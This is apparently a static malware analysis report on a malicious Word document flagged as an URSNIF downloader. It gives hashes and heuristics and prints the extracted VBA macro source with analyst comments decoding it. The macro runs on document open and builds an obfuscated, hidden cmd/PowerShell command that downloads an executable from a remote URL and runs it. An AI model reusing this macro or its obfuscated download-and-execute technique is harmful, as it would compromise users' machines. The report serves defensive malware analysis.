Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f480cb2897683bf1…

MALICIOUS

Office (OLE)

70.0 KB Created: 2018-09-06 08:16:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: e03b949d67da81644a7a8d8dd3e03fc2 SHA-1: 236a2da0e18580f6c48ad34c2ecd9695f4f37e24 SHA-256: f480cb2897683bf13a028225b749815fe5cebe63809a4497b867423bf8bae9e7
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros, specifically a Document_Open handler that passes a concatenated string to Shell() with vbHide (hidden window). The extracted macro source shows what that string is: a `cmd /V/C` command, heavily caret-escaped, that stores a character-reversed PowerShell one-liner in an environment variable, rebuilds it with a `for /L` loop counting down over its characters, and executes the result via `call`. Read backwards, the PowerShell creates a Net.WebClient, calls DownloadFile on a hard-coded http:// URL to drop an executable under $env:public, and runs it with Invoke-Item — a second-stage downloader, consistent with the ClamAV detection 'Doc.Downloader.URSNIF-6729855-3'.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace URI found in ordinary Office files, not a network contact point. The actual download URL is never present in clear text: the macro assembles it at runtime from caret-laced, reversed fragments (see the extracted script below), so it will not show up in a plain string/URL scan of the file.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4169 bytes
SHA-256: f316739b3828a00e9bb6c5e60c6ec033ce62258454a7a119b0db08f2614cc93e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "QzbXtOIT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst notes: VB_Base above makes this module the ThisDocument class, so
' Document_open below is the auto-run event handler Word fires when the
' document is opened with macros enabled (heuristic OLE_VBA_DOCOPEN).
Private Sub Document_open()
' "On Error Resume Next" split across four lines with continuation
' characters; it silently swallows every runtime error in this handler.
On _
Error _
Resume _
Next
' Each operand is a function in another module that returns one fragment of
' an obfuscated command line. pdGNKtTu and WBNvzVzXpcm are visible further
' down this listing (pdGNKtTu's fragment starts with cmd /V/C"); ddupi,
' tPhziYwi, LGLrvFfwTW, WBRhnRuVKCZw and PVqHiqPChuDQhX are not in the shown
' portion of the listing, so what they contribute (presumably nothing or a
' harmless prefix, since the cmd invocation starts in pdGNKtTu) cannot be
' confirmed from here. Format(ddupi) with no format argument just converts
' the value to a string. The joined string is run by Shell with a hidden
' window (vbHide) -- heuristic OLE_VBA_SHELL.
Shell Format(ddupi) + tPhziYwi + LGLrvFfwTW + pdGNKtTu + WBNvzVzXpcm + WBRhnRuVKCZw + PVqHiqPChuDQhX, vbHide
End Sub



Attribute VB_Name = "tPEnJtjhB"
' Analyst notes: returns the first (and largest) fragment of the command line
' that Document_open hands to Shell. All "Month ..." statements interleaved
' below are filler: Month() is called on junk strings and its return value is
' discarded, so they contribute nothing to the result; any Type-mismatch
' error they raise is swallowed by the On Error Resume Next at the top.
' Character arithmetic used throughout: Chr(9+4+11+3+72)=Chr(99)="c",
' Chr(6+3+7+2+49)=Chr(67)="C", Chr(3+1+3+1+26)=Chr(34)=double quote.
' The "^" characters are cmd.exe escapes and disappear once cmd parses the
' string. With carets removed, the fragment reads:
'   cmd /V/C"set rD3=<reversed text>&&for /L %B in (263;-1;0)do set Ksjb=!Ks...
' i.e. it stores a ~264-character string in rD3 and starts a countdown loop
' (continued in WBNvzVzXpcm) that copies rD3 one character at a time, last
' to first, into Ksjb -- un-reversing it -- and then calls it. Reading the
' per-line fragments right-to-left, that string is a PowerShell one-liner of
' the shape (decoded by hand -- confirm with a dynamic run or olevba --deobf):
'   powershell $jTb=new-object Net.WebClient;$mZr='http://<host>/RTT/...php?l=...'.Split('@');
'   $EJz = '623';$aiJ=$env:public+'\'+$EJz+'.exe';
'   foreach($YOq in $mZr){try{$jTb.DownloadFile($YOq, $aiJ);Invoke-Item $aiJ;break}catch{}}
' Download-and-execute of a second stage into %PUBLIC%\623.exe.
Function pdGNKtTu()

On _
Error _
Resume _
Next
Month "9966" + "467446462" + "76363378" + "5156"
   Month "JVsuwLLSv" + "mPDI" + "aZWC" + "iS"
' De-careted: cmd /V/C"set rD3=<spaces>   /V enables delayed (!var!)
' expansion needed by the loop later; /C runs the string then exits.
WRVlQtFVZ = Chr(9 + 4 + 11 + 3 + 72) + "md" + " /V/" + Chr(6 + 3 + 7 + 2 + 49) + Chr(3 + 1 + 3 + 1 + 26) + "^s^et" + " r^D" + "^" + "3=^ ^ " + "^ ^ " + "^" + " " + "  ^" + "  ^  "
Month "iiIm" + "S" + "fnhVX" + "97727222"
   Month "fiRFVWYHrjD" + "mc" + "365823208" + "9122"
' De-careted: "    }}{hctac};ka" -> reversed: "ak;}catch{}}" (tail of the script)
zwOToiOGf = "^   " + " " + "  ^}^}^" + "{^h" + Chr(9 + 4 + 11 + 3 + 72) + "^" + "ta" + Chr(9 + 4 + 11 + 3 + 72) + "^};^k^" + "a^"
Month "BH" + "NHlRoB" + "19865708" + "q"
   Month "jAKjcB" + "rPqvRPWIkaWH"
' De-careted: "erb;Jia$ metI-ekovnI;)Ji" -> reversed: "iJ);Invoke-Item $aiJ;bre"
bRqiPfziTN = "erb^" + ";J^i^a" + "$ ^met" + "I^-ek" + "^ovnI" + "^;)J^i^"
Month "HALIfzvBJ" + "U"
   Month "QcvF" + "or"
   Month "9968" + "6589" + "470121414" + "cTUPYCOp"
' De-careted: "a$ ,qOY$(eliFdaol" -> reversed: "loadFile($YOq, $a"
fOurHAcNWQO = "a^$ ^" + ",^q" + "O^Y$(^e" + "^li^" + "F^d" + "^ao^l"
Month "Cr" + "36621036" + "3144" + "3655"
' De-careted: "nwoD.bTj${yrt{)rZm$ ni qOY$(hcaerof;'e"
'   -> reversed: "e';foreach($YOq in $mZr){try{$jTb.Down"
OdCCN = "n^w^oD" + "^.^bTj$" + "^{^yrt" + "^{)r" + "^Z^m$ n" + "i^" + " qOY$(^" + "h" + Chr(9 + 4 + 11 + 3 + 72) + "aer" + "^o^" + "f^;'^e"
Month "8185" + "L" + "178856257" + "MwdmrGzh"
   Month "6212" + "mz"
   Month "510203704" + "GBj"
   Month "6269" + "mYzckGP"
' De-careted: "xe.'+zJE$+'\'+cilbup:vne$" -> reversed: "$env:public+'\'+$EJz+'.ex"
zDXGuO = "xe.^'" + "+zJ^E$" + "^+'\^" + "'^+" + Chr(9 + 4 + 11 + 3 + 72) + "^i" + "^l^bu" + "p^:vne" + "$^"
Month "509348050" + "QkWD" + "9287" + "Z"
   Month "24723910" + "4899"
   Month "FZdvXz" + "p"
   Month "G" + "mmLIpYT" + "6388" + "QSICjfj"
' De-careted: "=Jia$;'326' = zJE$;)'@'(tilpS.'nkt.2"
'   -> reversed: "2.tkn'.Split('@');$EJz = '623';$aiJ="  (end of the URL, file name)
lzaIQTOXI = "=J^i^a" + "$^;^'^" + "326'^ ^" + "=^ z^" + "J^E$^;" + ")^'" + "^@'(t" + "il^p" + "S.'n^k^" + "t.2"
Month "qT" + "ub" + "5673" + "dcOoJ"
   Month "jMswVMUd" + "VRdPbpVj"
   Month "NZpDa" + "7836" + "5831" + "hTL"
' De-careted: "bko=l?php.toksnapo/TTR/moc.byh" -> reversed: host suffix and
' path of the download URL ("...hyb.com/RTT/....php?l=okb")
BcDPZ = "bk^o^=" + "^l^?^p" + "hp.to^" + "k^sna^" + "p" + "^o/^TT" + "R/m^" + "o" + Chr(9 + 4 + 11 + 3 + 72) + "^.^" + "by^h^"
Month "26351163" + "cVc" + "TaMR" + "Vs"
   Month "nvN" + "483737923"
   Month "oT" + "9157"
' De-careted: "j8a1fisthd2//:ptth'=rZm$;t" -> reversed: "t;$mZr='http://2dhtsif1a8j"
' (start of the download URL; the host is split across this line and BcDPZ)
KzAMVOr = "j8a^1" + "fis^" + "th^d2//" + "^:p" + "^t^" + "t" + "h^'^=r" + "^Zm^$^" + ";" + "^" + "t"
Month "qOuzdlJoojG" + "2960" + "iG" + "jXhvjwvao"
   Month "qm" + "vWjkfNWlojP" + "h" + "7644"
' De-careted: "neilCbeW.teN tcejbo-wen=b" -> reversed: "b=new-object Net.WebClien"
NfGjc = "neil" + Chr(6 + 3 + 7 + 2 + 49) + "^b" + "^e" + "^W.teN" + "^" + " t" + Chr(9 + 4 + 11 + 3 + 72) + "^ej^b" + "^o^" + "-wen=^b"
Month "puoFmn" + "j"
   Month "dpcbYb" + "2610" + "MdVqJA" + "isBYvnfsAsb"
   Month "Hiq" + "378758750"
' De-careted: "Tj$ llehsrewop&&for /L %B in (2" -- "Tj$ llehsrewop" is the
' reversed "powershell $jT" that opens the script; "&&for /L %B in (2" then
' begins the batch loop that un-reverses rD3.
wJofFoFFzaT = "Tj$^ ^l" + "^le^h" + "^" + "s" + "r" + "^ewop&" + "&^" + "f^or /^" + "L %^B" + " ^in (2"
Month "uQDY" + "430086259"
   Month "247882774" + "Kj"
' De-careted: "63;-1;0)do set Ksjb=!Ks" -- loop bounds 263 down to 0 (one
' per character of rD3); the "set Ksjb=!Ksjb!!rD3:~%B,1!" assignment is
' completed in WBNvzVzXpcm, which also appends the "call" that runs it.
bzZnzOnBb = "6^3^;" + "^" + "-^" + "1" + "^" + ";^" + "0)^do" + " ^s^et" + " ^K" + "^s^jb" + "=!^K^" + "s"
' Return value: the twelve fragments joined in declaration order.
pdGNKtTu = WRVlQtFVZ + zwOToiOGf + bRqiPfziTN + fOurHAcNWQO + OdCCN + zDXGuO + lzaIQTOXI + BcDPZ + KzAMVOr + NfGjc + wJofFoFFzaT + bzZnzOnBb
   Month "9702" + "kAmv"
   Month "1556" + "181" + "A" + "208717829"
   Month "qP" + "VlEv" + "130475062" + "7900"
   Month "pQEV" + "Gjju" + "FklbpLDr" + "143029786"
End Function
Function WBNvzVzXpcm()

On _
Error _
Resume _
Next
Month "109673926" + "ucB"
   Month "vvN" + "9683" + "2406" + "227806542"
   Month "34" + "jXiZ" + "28842651" + "ROIw"
LHQRQBKljD = "^jb!" + "!r^D^" + "3:~%" + "^B,1!&" + "&i^f" + " %^B" + " ^le^q " + "^0 " + Chr(9 + 4 + 11 + 3 + 72) + "a" + "^l^l "
Month "7630" + "FmuJXJz"
   Month "JQaZ" + "ikq"
   Month "lPJU" + "mLBLBmwBCTtR" + "230901137" + "52506431"
   Month "Bsw" + "3205"
jLJwhuIDaJ = "%^" + "K^s" + "^jb:*" + "^Ksj^b" + "^!=%" + Chr(3 + 1 + 3 + 1 + 26) + "  "
WBNvzVzXpcm = LHQRQBKljD + jLJwhuIDaJ
   Month "52037817" + "BKYHnLZQA"
   Month "R" + "iCuE" + "D" + "8703"
   
... (truncated)